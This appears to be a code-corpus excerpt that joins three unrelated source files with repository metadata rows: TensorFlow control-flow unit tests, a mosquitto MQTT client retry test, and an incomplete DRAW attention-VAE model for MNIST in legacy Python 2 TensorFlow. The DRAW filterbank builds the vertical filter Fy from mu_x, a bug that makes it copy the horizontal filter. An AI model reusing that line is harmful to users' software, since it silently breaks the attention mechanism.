@test_util.run_v1_only("b/120545219")
def testGroup(self):
with self.cached_session() as sess:
v1 = variables.VariableV1([0.0])
v2 = variables.VariableV1([1.0])
# Group init1 and init2 and run.
init = control_flow_ops.group(v1.initializer, v2.initializer)
# Fetching v1 directly will result in an uninitialized error
with self.assertRaisesOpError("Attempting to use uninitialized value"):
self.evaluate(v1)
# Runs "init" before fetching v1 and v2.
init.run()
v1_val, v2_val = self.evaluate([v1, v2])
# Ensure that v1 and v2 are initialized
self.assertAllClose([0.0], v1_val)
self.assertAllClose([1.0], v2_val)
@test_util.run_v1_only("b/120545219")
def testGroupEmpty(self):
op = control_flow_ops.group()
self.assertEqual(op.type, "NoOp")
self.assertEqual(op.control_inputs, [])
@test_util.run_deprecated_v1
def testMergeShapes(self):
# All inputs unknown.
p1 = array_ops.placeholder(dtypes.float32)
p2 = array_ops.placeholder(dtypes.float32)
p3 = array_ops.placeholder(dtypes.float32)
m, index = control_flow_ops.merge([p1, p2, p3])
self.assertIs(None, m.get_shape().ndims)
self.assertEqual([], index.get_shape())
# All inputs known with different ranks.
p1 = array_ops.placeholder(dtypes.float32, shape=[1, 2])
p2 = array_ops.placeholder(dtypes.float32, shape=[1, 2, 3])
m, index = control_flow_ops.merge([p1, p2])
self.assertIs(None, m.get_shape().ndims)
self.assertEqual([], index.get_shape())
# All inputs known with some dimensions different.
p1 = array_ops.placeholder(dtypes.float32, shape=[1, 2])
p2 = array_ops.placeholder(dtypes.float32, shape=[2, 1])
m, index = control_flow_ops.merge([p1, p2])
self.assertEqual([None, None], m.get_shape().as_list())
self.assertEqual([], index.get_shape())
p1 = array_ops.placeholder(dtypes.float32, shape=[1, 2])
p2 = array_ops.placeholder(dtypes.float32, shape=[None, 2])
m, index = control_flow_ops.merge([p1, p2])
self.assertEqual([None, 2], m.get_shape().as_list())
self.assertEqual([], index.get_shape())
p1 = array_ops.placeholder(dtypes.float32, shape=[1, 2])
p2 = array_ops.placeholder(dtypes.float32, shape=[2, 2])
m, index = control_flow_ops.merge([p1, p2])
self.assertEqual([None, 2], m.get_shape().as_list())
self.assertEqual([], index.get_shape())
# All inputs known with same dimensions.
p1 = array_ops.placeholder(dtypes.float32, shape=[1, 2])
p2 = array_ops.placeholder(dtypes.float32, shape=[1, 2])
m, index = control_flow_ops.merge([p1, p2])
self.assertEqual([1, 2], m.get_shape().as_list())
self.assertEqual([], index.get_shape())
p1 = array_ops.placeholder(dtypes.float32, shape=[None, 2])
p2 = array_ops.placeholder(dtypes.float32, shape=[None, 2])
m, index = control_flow_ops.merge([p1, p2])
self.assertEqual([None, 2], m.get_shape().as_list())
self.assertEqual([], index.get_shape())
p1 = array_ops.placeholder(dtypes.float32, shape=[None, None])
p2 = array_ops.placeholder(dtypes.float32, shape=[None, None])
m, index = control_flow_ops.merge([p1, p2])
self.assertEqual([None, None], m.get_shape().as_list())
self.assertEqual([], index.get_shape())
@test_util.run_v1_only("b/120545219")
def testRefSelect(self):
index = array_ops.placeholder(dtypes.int32)
# All inputs unknown.
p1 = array_ops.placeholder(dtypes.float32)
p2 = array_ops.placeholder(dtypes.float32)
p3 = array_ops.placeholder(dtypes.float32)
v1 = variables.VariableV1(p1, validate_shape=False)
v2 = variables.VariableV1(p2, validate_shape=False)
v3 = variables.VariableV1(p3, validate_shape=False)
self.assertIs(None, v1.get_shape().ndims)
s = control_flow_ops.ref_select(index, [v1, v2, v3])
self.assertIs(None, s.get_shape().ndims)
# All inputs known but different.
v1 = variables.VariableV1([[1, 2]])
v2 = variables.VariableV1([[2], [1]])
s = control_flow_ops.ref_select(index, [v1, v2])
self.assertIs(None, s.get_shape().ndims)
# All inputs known and same.
v1 = variables.VariableV1([[1, 2]])
v2 = variables.VariableV1([[1, 2]])
s = control_flow_ops.ref_select(index, [v1, v2])
self.assertEqual([1, 2], s.get_shape())
# Possibly the same but not guaranteed.
v1 = variables.VariableV1([[1., 2.]])
p2 = array_ops.placeholder(dtypes.float32, shape=[None, 2])
v2 = variables.VariableV1(p2, validate_shape=False)
s = control_flow_ops.ref_select(index, [v1, v2])
self.assertEqual(None, s.get_shape())
@test_util.run_deprecated_v1
def testRunLoopTensor(self):
with self.cached_session() as sess:
tensor_list = []
def condition(t):
return t < constant_op.constant(5)
def body(_):
tensor_list.append(constant_op.constant(5))
return constant_op.constant(10)
result = control_flow_ops.while_loop(condition, body,
[constant_op.constant(4)])
self.assertEqual(10, self.evaluate(result))
# Ensure that we cannot run a tensor that escapes the loop body
# accidentally.
with self.assertRaises(ValueError):
sess.run(tensor_list[0])
@test_util.run_v1_only("b/120545219")
def testWhilePyFuncBasic(self):
def func(x):
return np.square(x)
with self.cached_session():
r = control_flow_ops.while_loop(
lambda i, v: i < 4,
lambda i, v: [i + 1, script_ops.py_func(func, [v], [dtypes.float32])[0]],
[constant_op.constant(0), constant_op.constant(2.0, dtypes.float32)],
[tensor_shape.unknown_shape(), tensor_shape.unknown_shape()])
self.assertEqual(self.evaluate(r[1]), 65536.0)
@test_util.run_v1_only("b/120545219")
def testWhileFuncBasic(self):
@function.Defun(dtypes.float32)
def func(x):
return math_ops.square(math_ops.square(x))
with self.cached_session():
x = constant_op.constant(2.0, dtypes.float32)
r = control_flow_ops.while_loop(
lambda i, v: i < 2, lambda i, v: [i + 1, func(v)],
[constant_op.constant(0), x],
[tensor_shape.unknown_shape(),
tensor_shape.unknown_shape()])
grad = gradients_impl.gradients(r, x)[0]
self.assertEqual(self.evaluate(r[1]), 65536.0)
self.assertEqual(self.evaluate(grad), 524288.0)
# while_v2 does not have stacks.
if not control_flow_util.ENABLE_CONTROL_FLOW_V2:
self.assertEqual(
len([op for op in x.graph.get_operations() if op.type == "StackV2"
]), 1)
@test_util.run_v1_only("b/120545219")
def testQIntSwitchMerge(self):
with self.cached_session(force_gpu=test.is_gpu_available()) as sess:
constant_qint = constant_op.constant(np.array([42]), dtypes.qint8)
cond = constant_op.constant(True, dtypes.bool)
v_f, v_t = control_flow_ops.switch(constant_qint, cond)
result = control_flow_ops.merge([v_f, v_t])
self.evaluate(result)
@test_util.run_v1_only("b/120545219")
def testQIntRefSwitchMerge(self):
with self.cached_session(use_gpu=test.is_gpu_available()) as sess:
var_qint = gen_state_ops.variable(
shape=[1], dtype=dtypes.qint8, name="v", container="", shared_name="")
assign_op = state_ops.assign(
var_qint, constant_op.constant(np.array([42]), dtypes.qint8))
self.evaluate(assign_op)
cond = constant_op.constant(True, dtypes.bool)
v_f, v_t = control_flow_ops.ref_switch(var_qint, cond)
result = control_flow_ops.ref_merge([v_f, v_t])
self.evaluate(result)
@test_util.run_v1_only("b/120545219")
def testUInt64SwitchMerge(self):
with self.cached_session(force_gpu=test.is_gpu_available()) as sess:
constant_uint64 = constant_op.constant(np.array([42]), dtypes.uint64)
cond = constant_op.constant(True, dtypes.bool)
v_f, v_t = control_flow_ops.switch(constant_uint64, cond)
result = control_flow_ops.merge([v_f, v_t])
self.evaluate(result)
@test_util.run_deprecated_v1
def testQIntArgAndRet(self):
@function.Defun(dtypes.qint8)
def func(x):
return x
with self.cached_session(force_gpu=test.is_gpu_available()) as sess:
qint = constant_op.constant(np.array([42]), dtypes.qint8)
result = func(qint)
self.evaluate(result)
class ControlFlowContextCheckTest(test.TestCase):
def _getWhileTensor(self):
"""Creates and returns a tensor from a while context."""
tensor = []
def body(i):
if not tensor:
tensor.append(constant_op.constant(1))
return i + tensor[0]
control_flow_ops.while_loop(lambda i: i < 10, body, [0])
return tensor[0]
def _getCondTensor(self):
cond_tensor = []
def true_fn():
if not cond_tensor:
cond_tensor.append(constant_op.constant(1))
return cond_tensor[0]
control_flow_ops.cond(
math_ops.less(1, 2), true_fn, lambda: constant_op.constant(0))
return cond_tensor[0]
@test_util.run_v1_only("b/120545219")
def testInvalidContext(self):
# Accessing a while loop tensor outside of control flow is illegal.
while_tensor = self._getWhileTensor()
with self.assertRaisesRegexp(
ValueError,
"Cannot use 'while/Const_1' as input to 'Add' because 'while/Const_1' "
"is in a while loop. See info log for more details."):
math_ops.add(1, while_tensor)
@test_util.run_v1_only("b/120545219")
def testInvalidContextInCond(self):
# Accessing a while loop tensor in cond is illegal.
while_tensor = self._getWhileTensor()
with self.assertRaisesRegexp(
ValueError, "Cannot use 'while/Const_1' as input to 'cond/Add' because "
"'while/Const_1' is in a while loop. See info log for more details."):
# TODO(skyewm): this passes if we return while_tensor directly instead
# of using it as input to another op.
control_flow_ops.cond(
math_ops.less(1, 2), lambda: math_ops.add(1, while_tensor),
lambda: constant_op.constant(0))
@test_util.run_v1_only("b/120545219")
def testInvalidContextInWhile(self):
# Accessing a while loop tensor in a different while loop is illegal.
while_tensor = self._getWhileTensor()
with self.assertRaisesRegexp(
ValueError,
"Cannot use 'while_1/Add' as input to 'while/Const_1' because they are "
"in different while loops. See info log for more details."):
control_flow_ops.while_loop(lambda i: i < 10,
lambda x: math_ops.add(1, while_tensor), [0])
with self.assertRaisesRegexp(
ValueError,
"Cannot use 'while_2/NextIteration' as input to 'while/Const_1' "
"because they are in different while loops. See info log for more "
"details."):
control_flow_ops.while_loop(lambda i: i < 10, lambda i: while_tensor, [0])
def testValidCondContext(self):
# Accessing a tensor from a cond context is OK (although dangerous).
cond_tensor = self._getCondTensor()
math_ops.add(1, cond_tensor)
def testValidCondContextBranches(self):
# Accessing a tensor from a cond context from the other branch's cond
# context is OK (although dangerous).
cond_tensor = []
def branch_fn():
if not cond_tensor:
cond_tensor.append(constant_op.constant(1))
return cond_tensor[0]
control_flow_ops.cond(math_ops.less(1, 2), branch_fn, branch_fn)
@test_util.run_v1_only("b/120545219")
def testValidWhileContext(self):
# Accessing a tensor in a nested while is OK.
def body(_):
c = constant_op.constant(1)
return control_flow_ops.while_loop(lambda i: i < 3, lambda i: i + c, [0])
control_flow_ops.while_loop(lambda i: i < 5, body, [0])
@test_util.run_v1_only("b/120545219")
def testValidNestedContexts(self):
# Accessing a tensor from a cond context in a while context, all inside an
# outer while context, is OK.
def body(_):
cond_tensor = self._getCondTensor()
# Create another cond containing the while loop for good measure
return control_flow_ops.cond(
math_ops.less(1, 2),
lambda: control_flow_ops.while_loop(lambda i: i < 3,
lambda i: i + cond_tensor, [0]),
lambda: constant_op.constant(0))
control_flow_ops.while_loop(lambda i: i < 5, body, [0])
@test_util.run_v1_only("b/120545219")
def testInvalidNestedContexts(self):
# Accessing a tensor from a while context in a different while context, all
# inside a cond context, is illegal.
def true_fn():
while_tensor = self._getWhileTensor()
return control_flow_ops.while_loop(lambda i: i < 3,
lambda i: i + while_tensor, [0])
with self.assertRaisesRegexp(
ValueError,
"Cannot use 'cond/while_1/add' as input to 'cond/while/Const_1' because"
" they are in different while loops. See info log for more details."):
control_flow_ops.cond(
math_ops.less(1, 2), true_fn, lambda: constant_op.constant(0))
class TupleTest(test.TestCase):
@test_util.run_v1_only("b/120545219")
def testTensors(self):
for v1_first in [True, False]:
with self.cached_session():
v1 = variables.VariableV1([1.0])
add1 = math_ops.add(
control_flow_ops.with_dependencies([v1.initializer], v1._ref()), # pylint: disable=protected-access
2.0)
v2 = variables.VariableV1([10.0])
add2 = math_ops.add(
control_flow_ops.with_dependencies([v2.initializer], v2._ref()), # pylint: disable=protected-access
20.0)
t1, _, t2 = control_flow_ops.tuple([add1, None, add2])
# v1 is not initialized.
with self.assertRaisesOpError("Attempting to use uninitialized value"):
self.evaluate(v1)
# v2 is not initialized.
with self.assertRaisesOpError("Attempting to use uninitialized value"):
self.evaluate(v2)
if v1_first:
# Getting t1 initializes v2.
self.assertAllClose([3.0], self.evaluate(t1))
self.assertAllClose([10.0], self.evaluate(v2))
else:
# Getting t2 initializes v1.
self.assertAllClose([30.0], self.evaluate(t2))
self.assertAllClose([1.0], self.evaluate(v1))
@test_util.run_v1_only("b/120545219")
def testIndexedSlices(self):
for v1_first in [True, False]:
with self.cached_session():
v1 = variables.VariableV1(
np.array([[0.0, 1.0], [10.0, 11.0], [20.0, 21.0]]).astype(
np.float32))
v1_at_1 = ops.IndexedSlices(
control_flow_ops.with_dependencies([v1.initializer], v1._ref()), # pylint: disable=protected-access
constant_op.constant([1]))
v2 = variables.VariableV1(
np.array([[0.1, 1.1], [10.1, 11.1], [20.1, 21.1]]).astype(
np.float32))
v2_at_1 = ops.IndexedSlices(
control_flow_ops.with_dependencies([v2.initializer], v2._ref()), # pylint: disable=protected-access
constant_op.constant([1]))
st1, st2 = control_flow_ops.tuple([v1_at_1, v2_at_1])
g1 = array_ops.gather(st1.values, st1.indices)
g2 = array_ops.gather(st2.values, st2.indices)
# v1 is not initialized.
with self.assertRaisesOpError("Attempting to use uninitialized value"):
self.evaluate(v1)
# v2 is not initialized.
with self.assertRaisesOpError("Attempting to use uninitialized value"):
self.evaluate(v2)
if v1_first:
# Getting g1 initializes v2.
self.assertAllClose([[10.0, 11.0]], self.evaluate(g1))
self.assertAllClose([[0.1, 1.1], [10.1, 11.1], [20.1, 21.1]],
self.evaluate(v2))
else:
# Getting g2 initializes v1.
self.assertAllClose([[10.1, 11.1]], self.evaluate(g2))
self.assertAllClose([[0.0, 1.0], [10.0, 11.0], [20.0, 21.0]],
self.evaluate(v1))
def testAcceptTensorsAsControlInputs(self):
with self.cached_session():
var = variables.VariableV1(0)
assign = state_ops.assign(var, 1)
t, = control_flow_ops.tuple(
[constant_op.constant(0)], control_inputs=[assign])
# Should trigger the assign.
self.evaluate(t)
self.assertEquals(1, self.evaluate(var))
class AssertTest(test.TestCase):
@test_util.run_deprecated_v1
def testGuardedAssertDoesNotCopyWhenTrue(self):
with self.session(use_gpu=True) as sess:
with ops.device(test.gpu_device_name()):
value = constant_op.constant(1.0)
with ops.device("/cpu:0"):
true = constant_op.constant(True)
guarded_assert = control_flow_ops.Assert(true, [value], name="guarded")
unguarded_assert = gen_logging_ops._assert(
true, [value], name="unguarded")
opts = config_pb2.RunOptions(trace_level=config_pb2.RunOptions.FULL_TRACE)
guarded_metadata = config_pb2.RunMetadata()
sess.run(guarded_assert, options=opts, run_metadata=guarded_metadata)
unguarded_metadata = config_pb2.RunMetadata()
sess.run(unguarded_assert, options=opts, run_metadata=unguarded_metadata)
guarded_nodestat_names = [
n.node_name
for d in guarded_metadata.step_stats.dev_stats
for n in d.node_stats
]
unguarded_nodestat_names = [
n.node_name
for d in unguarded_metadata.step_stats.dev_stats
for n in d.node_stats
]
guarded_memcpy_nodestat_names = [
n for n in guarded_nodestat_names if "MEMCPYDtoH" in n
]
unguarded_memcpy_nodestat_names = [
n for n in unguarded_nodestat_names if "MEMCPYDtoH" in n
]
if "GPU" in [d.device_type for d in device_lib.list_local_devices()]:
# A copy was performed for the unguarded assert
self.assertLess(0, len(unguarded_memcpy_nodestat_names))
# No copy was performed for the guarded assert
self.assertEqual([], guarded_memcpy_nodestat_names)
class WhileOpBenchmark(test.Benchmark):
"""Evaluate the performance of while_loop op."""
def _getInitVariables(self):
batch_size = 10
image_size = 256
kernel_size = 3
depth = 16
init_step = constant_op.constant(-1)
image = variable_scope.get_variable(
"image",
initializer=random_ops.random_normal(
[batch_size, image_size, image_size, depth],
dtype=dtypes.float32,
stddev=1e-1))
kernel = variable_scope.get_variable(
"weights",
initializer=random_ops.truncated_normal(
[kernel_size, kernel_size, depth, depth],
dtype=dtypes.float32,
stddev=1e-1))
return init_step, image, kernel
def _runOneBenchmark(self,
default_device,
num_iters=10,
static_unroll=False,
steps=10):
"""Evaluate the while loop performance.
Args:
default_device: The default device to run all ops except the loop_body.
loop_body is always run on GPU.
num_iters: Number of iterations to run.
static_unroll: If true, run unrolled version; otherwise, run while_loop.
steps: Total number of repeated steps to run the loop.
Returns:
The duration of the run in seconds.
"""
def loop_body(i, x):
with ops.device("/gpu:0"):
# Always put loop body on GPU.
nx = nn_ops.conv2d(
input=x,
filter=kernel,
strides=[1, 1, 1, 1],
padding="SAME",
data_format="NHWC",
name="conv2d")
ni = math_ops.add(i, 1)
return ni, nx
ops.reset_default_graph()
with session.Session() as sess, ops.device(default_device):
# Get the initial id i, input x, and kernel.
i, x, kernel = self._getInitVariables()
variables.global_variables_initializer().run()
if static_unroll:
for _ in xrange(steps):
i, x = loop_body(i, x)
else:
i, x = control_flow_ops.while_loop(
lambda i, _: i < steps,
loop_body, [i, x],
parallel_iterations=steps,
swap_memory=True)
r = math_ops.reduce_sum(x)
dx, dk = gradients_impl.gradients(r, [x, kernel])
# Use group to avoid fetching back results.
r = control_flow_ops.group(dx, dk)
for _ in xrange(3):
# exclude warm up time
self.evaluate(r)
start_time = time.time()
for _ in xrange(num_iters):
self.evaluate(r)
return (time.time() - start_time) / num_iters
def benchmarkWhileOpCrossDevicePlacement(self):
iters = 10
# Run loop body on GPU, but other ops on CPU.
duration = self._runOneBenchmark("cpu", iters, static_unroll=False)
self.report_benchmark(
name="while_op_cross_device", iters=iters, wall_time=duration)
def benchmarkWhileOpSameDevicePlacement(self):
iters = 10
# Run all ops on the same GPU device.
duration = self._runOneBenchmark("gpu", iters, static_unroll=False)
self.report_benchmark(
name="while_op_same_device", iters=iters, wall_time=duration)
def benchmarkWhileOpUnrollCrossDevicePlacement(self):
iters = 10
# Run loop body on GPU, but other ops on CPU.
duration = self._runOneBenchmark("cpu", iters, static_unroll=True)
self.report_benchmark(
name="unroll_cross_device_cpu", iters=iters, wall_time=duration)
def benchmarkWhileOpUnrollSameDevicePlacement(self):
iters = 10
# Run all ops on GPU.
duration = self._runOneBenchmark("gpu", iters, static_unroll=True)
self.report_benchmark(
name="unroll_same_device", iters=iters, wall_time=duration)
@test_util.with_control_flow_v2
class EagerTest(test.TestCase):
def testCond(self):
with context.eager_mode():
pred = math_ops.less(1, 2)
fn1 = lambda: [constant_op.constant(10)]
fn2 = lambda: [constant_op.constant(20)]
r = control_flow_ops.cond(pred, fn1, fn2)
self.assertAllEqual(r.numpy(), 10)
self.assertFalse(isinstance(r, list))
# TODO(b/117279927): Re-enable once msan failure is fixed.
def DISABLED_testCondInDefun(self):
with context.eager_mode():
@eager_function.defun
def foo(pred):
# TODO(b/111124878): this only needs to output one element.
fn1 = lambda: (constant_op.constant(10), constant_op.constant(100))
fn2 = lambda: (constant_op.constant(20), constant_op.constant(200))
return control_flow_ops.cond(constant_op.constant(pred), fn1, fn2)
r = foo(True)
self.assertAllEqual(r[0].numpy(), 10)
self.assertNotIsInstance(r, list)
r = foo(False)
self.assertAllEqual(r[0].numpy(), 20)
self.assertFalse(isinstance(r, list))
def testWhileLoop(self):
with context.eager_mode():
tensor = constant_op.constant([1, 2, 3, 4, 5])
self.assertAllEqual(isum(tensor).numpy(), [46, 47, 48, 49, 50])
def testWhileLoopWithMaxIterations(self):
with context.eager_mode():
tensor = constant_op.constant([1, 2, 3, 4, 5])
self.assertAllEqual(
isum(tensor, maximum_iterations=3).numpy(),
[1 + 3, 2 + 3, 3 + 3, 4 + 3, 5 + 3])
@test_util.run_v1_only("b/120545219")
def testWhileWithMaximumIterationsAndSingleArgument(self):
with context.eager_mode():
tensor = constant_op.constant(0)
r = control_flow_ops.while_loop(
lambda i: i < 3, lambda i: i + 1, [tensor], maximum_iterations=1)
self.assertEqual(1, r.numpy())
def testWithDependencies(self):
with context.eager_mode():
t1 = constant_op.constant(1)
t2 = constant_op.constant(2)
t3 = control_flow_ops.with_dependencies(t1, t2)
self.assertAllEqual(t2.numpy(), t3.numpy())
def testTuple(self):
with context.eager_mode():
t1 = constant_op.constant(1)
t2 = constant_op.constant(2)
tup1, tup2 = control_flow_ops.tuple([t1, t2])
self.assertAllEqual(t1.numpy(), tup1.numpy())
self.assertAllEqual(t2.numpy(), tup2.numpy())
@test_util.run_v1_only("b/120545219")
def testCase(self):
with context.eager_mode():
x = constant_op.constant(1)
y = constant_op.constant(2)
z = constant_op.constant(3)
f1 = lambda: constant_op.constant(17)
f2 = lambda: constant_op.constant(23)
f3 = lambda: constant_op.constant(-1)
r1 = control_flow_ops.case(
[(x < y, f1), (x > z, f2)], default=f3, exclusive=True)
self.assertAllEqual(r1.numpy(), 17)
if __name__ == "__main__":
test.main()
| apache-2.0 | -332,232,264,619,329,100 | 35.87363 | 112 | 0.617802 | false |
telefonicaid/fiware-IoTAgent-Cplusplus | third_party/mosquitto-1.4.4/test/lib/03-publish-c2b-qos1-timeout.py | 7 | 2881 | #!/usr/bin/env python
# Test whether a client sends a correct PUBLISH to a topic with QoS 1 and responds to a delay.
# The client should connect to port 1888 with keepalive=60, clean session set,
# and client id publish-qos1-test
# The test will send a CONNACK message to the client with rc=0. Upon receiving
# the CONNACK the client should verify that rc==0. If not, it should exit with
# return code=1.
# On a successful CONNACK, the client should send a PUBLISH message with topic
# "pub/qos1/test", payload "message" and QoS=1.
# The test will not respond to the first PUBLISH message, so the client must
# resend the PUBLISH message with dup=1. Note that to keep test durations low, a
# message retry timeout of less than 10 seconds is required for this test.
# On receiving the second PUBLISH message, the test will send the correct
# PUBACK response. On receiving the correct PUBACK response, the client should
# send a DISCONNECT message.
import inspect
import os
import subprocess
import socket
import sys
import time
# From http://stackoverflow.com/questions/279237/python-import-a-module-from-a-folder
cmd_subfolder = os.path.realpath(os.path.abspath(os.path.join(os.path.split(inspect.getfile( inspect.currentframe() ))[0],"..")))
if cmd_subfolder not in sys.path:
sys.path.insert(0, cmd_subfolder)
import mosq_test
rc = 1
keepalive = 60
connect_packet = mosq_test.gen_connect("publish-qos1-test", keepalive=keepalive)
connack_packet = mosq_test.gen_connack(rc=0)
disconnect_packet = mosq_test.gen_disconnect()
mid = 1
publish_packet = mosq_test.gen_publish("pub/qos1/test", qos=1, mid=mid, payload="message")
publish_packet_dup = mosq_test.gen_publish("pub/qos1/test", qos=1, mid=mid, payload="message", dup=True)
puback_packet = mosq_test.gen_puback(mid)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.settimeout(10)
sock.bind(('', 1888))
sock.listen(5)
client_args = sys.argv[1:]
env = dict(os.environ)
env['LD_LIBRARY_PATH'] = '../../lib:../../lib/cpp'
try:
pp = env['PYTHONPATH']
except KeyError:
pp = ''
env['PYTHONPATH'] = '../../lib/python:'+pp
client = mosq_test.start_client(filename=sys.argv[1].replace('/', '-'), cmd=client_args, env=env)
try:
(conn, address) = sock.accept()
conn.settimeout(10)
if mosq_test.expect_packet(conn, "connect", connect_packet):
conn.send(connack_packet)
if mosq_test.expect_packet(conn, "publish", publish_packet):
# Delay for > 3 seconds (message retry time)
if mosq_test.expect_packet(conn, "dup publish", publish_packet_dup):
conn.send(puback_packet)
if mosq_test.expect_packet(conn, "disconnect", disconnect_packet):
rc = 0
conn.close()
finally:
client.terminate()
client.wait()
sock.close()
exit(rc)
| agpl-3.0 | -3,187,448,714,301,827,600 | 33.710843 | 129 | 0.706005 | false |
HaydenFaulkner/phd | tensorflow_code/external_libraries/draw-kvfrans/main.py | 1 | 9552 | import tensorflow as tf
import numpy as np
from ops import *
from utils import *
import input_data
# from scipy.misc import imsave as ims
class Draw():
def __init__(self):
self.mnist = input_data.read_data_sets("MNIST_data/", one_hot=True)
self.n_samples = self.mnist.train.num_examples
self.img_size = 28
self.attention_n = 5
self.n_hidden = 256
self.n_z = 10
self.sequence_length = 10
self.batch_size = 64
self.share_parameters = False
self.images = tf.placeholder(tf.float32, [None, 784])
self.e = tf.random_normal((self.batch_size, self.n_z), mean=0, stddev=1) # Qsampler noise
self.lstm_enc = tf.nn.rnn_cell.LSTMCell(self.n_hidden, state_is_tuple=True) # encoder Op
self.lstm_dec = tf.nn.rnn_cell.LSTMCell(self.n_hidden, state_is_tuple=True) # decoder Op
self.cs = [0] * self.sequence_length
self.mu, self.logsigma, self.sigma = [0] * self.sequence_length, [0] * self.sequence_length, [0] * self.sequence_length
h_dec_prev = tf.zeros((self.batch_size, self.n_hidden))
enc_state = self.lstm_enc.zero_state(self.batch_size, tf.float32)
dec_state = self.lstm_dec.zero_state(self.batch_size, tf.float32)
x = self.images
for t in range(self.sequence_length):
# error image + original image
c_prev = tf.zeros((self.batch_size, self.img_size**2)) if t == 0 else self.cs[t-1]
x_hat = x - tf.sigmoid(c_prev)
# read the image
r = self.read_basic(x,x_hat,h_dec_prev)
print r.get_shape()
# r = self.read_attention(x,x_hat,h_dec_prev)
            # encode it to a gaussian distribution
self.mu[t], self.logsigma[t], self.sigma[t], enc_state = self.encode(enc_state, tf.concat(1, [r, h_dec_prev]))
            # sample from the distribution to get z
z = self.sampleQ(self.mu[t],self.sigma[t])
print z.get_shape()
# retrieve the hidden layer of RNN
h_dec, dec_state = self.decode_layer(dec_state, z)
print h_dec.get_shape()
# map from hidden layer -> image portion, and then write it.
self.cs[t] = c_prev + self.write_basic(h_dec)
# self.cs[t] = c_prev + self.write_attention(h_dec)
h_dec_prev = h_dec
self.share_parameters = True # from now on, share variables
# the final timestep
self.generated_images = tf.nn.sigmoid(self.cs[-1])
self.generation_loss = tf.reduce_mean(-tf.reduce_sum(self.images * tf.log(1e-10 + self.generated_images) + (1-self.images) * tf.log(1e-10 + 1 - self.generated_images),1))
kl_terms = [0]*self.sequence_length
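        # Accumulate the KL divergence of each Q(z_t|x) from the N(0, I) prior across timesteps;
        # each term below follows 0.5 * sum(mu^2 + sigma^2 - 2*log(sigma)) minus a constant offset.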
for t in xrange(self.sequence_length):
mu2 = tf.square(self.mu[t])
sigma2 = tf.square(self.sigma[t])
logsigma = self.logsigma[t]
kl_terms[t] = 0.5 * tf.reduce_sum(mu2 + sigma2 - 2*logsigma, 1) - self.sequence_length*0.5
self.latent_loss = tf.reduce_mean(tf.add_n(kl_terms))
self.cost = self.generation_loss + self.latent_loss
optimizer = tf.train.AdamOptimizer(1e-3, beta1=0.5)
grads = optimizer.compute_gradients(self.cost)
for i,(g,v) in enumerate(grads):
if g is not None:
grads[i] = (tf.clip_by_norm(g,5),v)
self.train_op = optimizer.apply_gradients(grads)
self.sess = tf.Session()
self.sess.run(tf.initialize_all_variables())
def train(self):
for i in xrange(15000):
xtrain, _ = self.mnist.train.next_batch(self.batch_size)
cs, gen_loss, lat_loss, _ = self.sess.run([self.cs, self.generation_loss, self.latent_loss, self.train_op], feed_dict={self.images: xtrain})
print "iter %d genloss %f latloss %f" % (i, gen_loss, lat_loss)
if i % 500 == 0:
cs = 1.0/(1.0+np.exp(-np.array(cs))) # x_recons=sigmoid(canvas)
for cs_iter in xrange(10):
results = cs[cs_iter]
results_square = np.reshape(results, [-1, 28, 28])
print results_square.shape
ims("results/"+str(i)+"-step-"+str(cs_iter)+".jpg",merge(results_square,[8,8]))
# given a hidden decoder layer:
# locate where to put attention filters
def attn_window(self, scope, h_dec):
with tf.variable_scope(scope, reuse=self.share_parameters):
parameters = dense(h_dec, self.n_hidden, 5)
# gx_, gy_: center of 2d gaussian on a scale of -1 to 1
gx_, gy_, log_sigma2, log_delta, log_gamma = tf.split(1,5,parameters)
# move gx/gy to be a scale of -imgsize to +imgsize
gx = (self.img_size+1)/2 * (gx_ + 1)
gy = (self.img_size+1)/2 * (gy_ + 1)
sigma2 = tf.exp(log_sigma2)
# stride/delta: how far apart these patches will be
delta = (self.img_size - 1) / ((self.attention_n-1) * tf.exp(log_delta))
# returns [Fx, Fy, gamma]
return self.filterbank(gx,gy,sigma2,delta) + (tf.exp(log_gamma),)
# Given a center, distance, and spread
# Construct [attention_n x attention_n] patches of gaussian filters
    # represented by Fx = horizontal gaussian, Fy = vertical gaussian
def filterbank(self, gx, gy, sigma2, delta):
# 1 x N, look like [[0,1,2,3,4]]
grid_i = tf.reshape(tf.cast(tf.range(self.attention_n), tf.float32),[1, -1])
# centers for the individual patches
mu_x = gx + (grid_i - self.attention_n/2 - 0.5) * delta
mu_y = gy + (grid_i - self.attention_n/2 - 0.5) * delta
mu_x = tf.reshape(mu_x, [-1, self.attention_n, 1])
mu_y = tf.reshape(mu_y, [-1, self.attention_n, 1])
# 1 x 1 x imgsize, looks like [[[0,1,2,3,4,...,27]]]
im = tf.reshape(tf.cast(tf.range(self.img_size), tf.float32), [1, 1, -1])
# list of gaussian curves for x and y
sigma2 = tf.reshape(sigma2, [-1, 1, 1])
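        # Fx and Fy each have shape [batch, attention_n, img_size]: one 1-D gaussian per
        # row/column of the attention patch.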
Fx = tf.exp(-tf.square((im - mu_x) / (2*sigma2)))
        Fy = tf.exp(-tf.square((im - mu_y) / (2*sigma2)))
# normalize so area-under-curve = 1
Fx = Fx / tf.maximum(tf.reduce_sum(Fx,2,keep_dims=True),1e-8)
Fy = Fy / tf.maximum(tf.reduce_sum(Fy,2,keep_dims=True),1e-8)
return Fx, Fy
# the read() operation without attention
def read_basic(self, x, x_hat, h_dec_prev):
return tf.concat(1,[x,x_hat])
def read_attention(self, x, x_hat, h_dec_prev):
Fx, Fy, gamma = self.attn_window("read", h_dec_prev)
# we have the parameters for a patch of gaussian filters. apply them.
def filter_img(img, Fx, Fy, gamma):
Fxt = tf.transpose(Fx, perm=[0,2,1])
img = tf.reshape(img, [-1, self.img_size, self.img_size])
# Apply the gaussian patches:
# keep in mind: horiz = imgsize = verts (they are all the image size)
# keep in mind: attn = height/length of attention patches
# allfilters = [attn, vert] * [imgsize,imgsize] * [horiz, attn]
# we have batches, so the full batch_matmul equation looks like:
# [1, 1, vert] * [batchsize,imgsize,imgsize] * [1, horiz, 1]
glimpse = tf.batch_matmul(Fy, tf.batch_matmul(img, Fxt))
glimpse = tf.reshape(glimpse, [-1, self.attention_n**2])
# finally scale this glimpse w/ the gamma parameter
return glimpse * tf.reshape(gamma, [-1, 1])
x = filter_img(x, Fx, Fy, gamma)
x_hat = filter_img(x_hat, Fx, Fy, gamma)
return tf.concat(1, [x, x_hat])
# encode an attention patch
def encode(self, prev_state, image):
# update the RNN with image
